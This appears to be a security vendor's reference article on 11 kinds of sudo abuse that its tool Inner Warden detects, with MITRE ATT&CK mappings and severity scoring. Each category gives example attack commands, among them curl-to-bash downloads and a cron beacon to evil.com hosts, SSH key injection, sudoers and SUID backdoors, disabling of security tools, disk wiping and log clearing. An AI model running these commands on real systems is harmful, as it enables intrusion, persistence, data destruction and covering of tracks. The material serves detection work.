Threat Detection

11 Types of Sudo Abuse Inner Warden Detects (MITRE ATT&CK Mapped)


Sudo abuse is not just "too many sudo commands." It is a diverse set of techniques that attackers use after gaining initial access to escalate privileges, establish persistence, cover tracks, and move laterally. Inner Warden classifies sudo commands into 11 distinct categories, each mapped to MITRE ATT&CK techniques, with proportional severity scoring.

This reference covers every category: what it means, what commands trigger it, the MITRE mapping, and how severity is calculated.

All 11 categories at a glance

| Category | MITRE ATT&CK | Base severity |
|---|---|---|
| identity_change | T1136 (Create Account) | High |
| privilege_policy_change | T1548.003 (Sudo/Sudo Caching) | Critical |
| suid_manipulation | T1548.001 (Setuid/Setgid) | Critical |
| security_control_change | T1562.001 (Disable Security Tools) | Critical |
| remote_script_execution | T1059.004 (Unix Shell) | Critical |
| service_disruption | T1489 (Service Stop) | High |
| ssh_key_injection | T1098.004 (SSH Authorized Keys) | Critical |
| cron_persistence | T1053.003 (Cron) | High |
| tmp_execution | T1036.005 (Match Legitimate Name) | High |
| destructive_command | T1485 (Data Destruction) | Critical |
| log_tampering | T1070.002 (Clear Linux Logs) | Critical |

Detailed breakdown

1. identity_change

Creating or modifying user accounts with elevated privileges. An attacker with sudo creates a backdoor account to maintain access even if their initial entry point is discovered.

sudo useradd -m -s /bin/bash backdoor
sudo usermod -aG sudo backdoor
sudo passwd deploy

MITRE: T1136 (Create Account) | Severity: High (Critical if adding to sudo group)

2. privilege_policy_change

Modifying the sudoers file to grant additional privileges or remove password requirements. This is one of the most dangerous categories because it makes privilege escalation permanent and silent.

sudo visudo
sudo echo "deploy ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
sudo chmod 440 /etc/sudoers

MITRE: T1548.003 (Abuse Elevation Control - Sudo) | Severity: Critical

3. suid_manipulation

Setting the SUID bit on binaries so they run as root regardless of who executes them. A classic persistence technique: the attacker sets SUID on a copy of bash, then can get root without sudo at any time.

sudo chmod u+s /usr/bin/find
sudo chmod 4755 /tmp/backdoor
sudo cp /bin/bash /tmp/.hidden && sudo chmod u+s /tmp/.hidden

MITRE: T1548.001 (Setuid and Setgid) | Severity: Critical

4. security_control_change

Disabling firewalls, stopping security services, or modifying security configurations. The attacker removes the defenses before proceeding with their objective.

sudo ufw disable
sudo systemctl stop fail2ban
sudo iptables -F
sudo setenforce 0
sudo systemctl stop apparmor

MITRE: T1562.001 (Impair Defenses - Disable Security Tools) | Severity: Critical

5. remote_script_execution

Downloading and executing scripts from remote URLs with elevated privileges. This is how crypto miners, rootkits, and botnet agents are typically deployed.

sudo curl -s http://evil.com/miner.sh | bash
sudo wget -qO- http://evil.com/install | sh
sudo bash -c "$(curl -fsSL http://evil.com/setup)"

MITRE: T1059.004 (Command and Scripting - Unix Shell) | Severity: Critical

6. service_disruption

Stopping or restarting critical services. This could be sabotage, preparation for swapping in a replacement service, or a disruption intended to cover other activity.

sudo systemctl stop nginx
sudo systemctl stop sshd
sudo kill -9 $(pidof postgres)

MITRE: T1489 (Service Stop) | Severity: High (Critical if stopping security services)

7. ssh_key_injection

Adding SSH keys to authorized_keys files for passwordless persistent access. This is the most common persistence mechanism after initial compromise.

sudo echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys
sudo tee -a /home/ubuntu/.ssh/authorized_keys <<< "ssh-ed25519 ..."
sudo cp /tmp/key.pub /root/.ssh/authorized_keys

MITRE: T1098.004 (Account Manipulation - SSH Authorized Keys) | Severity: Critical

8. cron_persistence

Creating or modifying cron jobs for scheduled execution. Attackers use cron to re-establish access if their main backdoor is discovered, or to periodically phone home.

sudo crontab -e
sudo echo "*/5 * * * * curl http://c2.evil.com/beacon" >> /etc/crontab
sudo cp /tmp/backdoor.cron /etc/cron.d/system-update

MITRE: T1053.003 (Scheduled Task/Job - Cron) | Severity: High

9. tmp_execution

Executing binaries from /tmp, /dev/shm, or other world-writable directories. Legitimate software is never executed from /tmp. This is a strong indicator of malicious activity.

sudo /tmp/exploit
sudo chmod +x /dev/shm/miner && sudo /dev/shm/miner
sudo bash /tmp/.hidden/payload.sh

MITRE: T1036.005 (Masquerading - Match Legitimate Name) | Severity: High

10. destructive_command

Commands that delete, overwrite, or wipe data. These are used for sabotage, ransom preparation, or covering tracks by destroying evidence.

sudo rm -rf /
sudo dd if=/dev/zero of=/dev/sda
sudo mkfs.ext4 /dev/sda1
sudo shred -vfz /var/log/*

MITRE: T1485 (Data Destruction) | Severity: Critical

11. log_tampering

Clearing, truncating, or modifying log files to remove evidence of the attacker's activities. This is often the last step before the attacker goes quiet.

sudo truncate -s 0 /var/log/auth.log
sudo echo "" > /var/log/syslog
sudo journalctl --vacuum-time=1s
sudo rm /var/log/wtmp /var/log/btmp

MITRE: T1070.002 (Indicator Removal - Clear Linux Logs) | Severity: Critical

How severity scoring works

Inner Warden uses proportional severity scoring. A single suspicious command gets its base severity. Multiple commands from the same user in a short window escalate the severity:

| Commands in window | Resulting severity |
|---|---|
| 1 command, non-critical category | Medium |
| 1 command, critical category | High |
| 3+ commands, any category | High |
| 5+ commands with critical categories | Critical |
| Multiple categories in same session | Critical |

This prevents alert fatigue. A developer running sudo systemctl restart nginx does not trigger an alert. But if they also run sudo useradd and sudo chmod u+s in the same window, that is a critical incident regardless of the individual command severities.

Set it up

All 11 sudo abuse categories are detected out of the box. Install Inner Warden and enable sudo protection:

# Install
curl -fsSL https://innerwarden.com/install | sudo bash
# Enable sudo protection
innerwarden enable sudo-protection

Detection starts immediately in dry-run mode. Review the detections, then enable automated response when you trust the output.

What to do next